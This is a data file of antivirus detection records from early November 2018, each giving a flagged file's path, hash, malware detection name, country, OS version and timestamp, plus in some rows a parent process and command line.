  Row(detection=Row(filename='avscan-20181102-053648-432a3fb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053648-432A3FB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055306-8a4b021f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055306-8A4B021F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060120-b0af288a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060120-B0AF288A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051639-72c3f1da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051639-72C3F1DA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061940-40115404', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061940-40115404', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051813-aadf6114', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051813-AADF6114', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051657-7d568d4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051657-7D568D4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052328-665b39f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052328-665B39F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062336-ccbc1f64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062336-CCBC1F64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='79b60c546b57a845a45b41b1c5f6af57933439927e1dcf49660b5237f9b18697', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\79B60C546B57A845A45B41B1C5F6AF57933439927E1DCF49660B5237F9B18697', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='79b60c546b57a845a45b41b1c5f6af57933439927e1dcf49660b5237f9b18697', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053317-c5ce1278', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053317-C5CE1278', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053328-cc401295', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053328-CC401295', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054200-fd3e5941', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054200-FD3E5941', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054451-631b88d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054451-631B88D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\save\\Neuer Ordner\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='78d09462c04f5750efc0ce85619ec94ae431af9ae2cc79596f9b048fec90eae2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Jxy+eO6QvUGP8fi7.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T15:56:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053806-71c2a687', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053806-71C2A687', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054121-e619d5cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054121-E619D5CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050618-008cf0ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050618-008CF0AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_13937899.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_13937899.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:03:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050621-021d2740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050621-021D2740', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062220-9fe38064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062220-9FE38064', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051441-2c2044c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051441-2C2044C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051725-8e2cd2b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051725-8E2CD2B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055422-b76568a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055422-B76568A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054147-f5c093f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054147-F5C093F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055821-45d20627', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055821-45D20627', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:19:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054311-2782ec5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054311-2782EC5C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:56:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050542-eb1d5c65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050542-EB1D5C65', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155934-e5c08952', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155934-E5C08952', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=36000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='0dd7b989deda6fac6c8b0231a910e5534802bf313207b734bdec25ba0be41928', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:45:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bipartit.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\bipartit 2015\\LPA BIPARTIT\\BIPARTIT.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bu dwi.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO APAR KANTIN\\bu dwi\\bu dwi.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201713-8f0bff85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b4863973\\AVSCAN-20181101-195810-E274B34F\\AVSCAN-20181101-201713-8F0BFF85', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:17:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cpp.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cpp.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T00:45:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115008-1dacd1b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_051aad7c\\AVSCAN-20181101-114053-D04040A0\\AVSCAN-20181101-115008-1DACD1B5', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:50:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180446-6920affb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180100-406F2FA7\\AVSCAN-20181101-180446-6920AFFB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155849-de35de91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155849-DE35DE91', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5187480\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\installer_atube_catcher.exe', parentsize=2526136, timestamp='2018-11-01T18:04:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151845-09a7e884', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151446-E857F837\\AVSCAN-20181101-151845-09A7E884', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152152-23bbd9ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151718-FD847E0B\\AVSCAN-20181101-152152-23BBD9EF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:40:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh991c.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH991C.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:38:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:53:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh64c8.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH64C8.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-26T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T04:07:14Z'), dt=datetime.date(2018, 11, 1)),
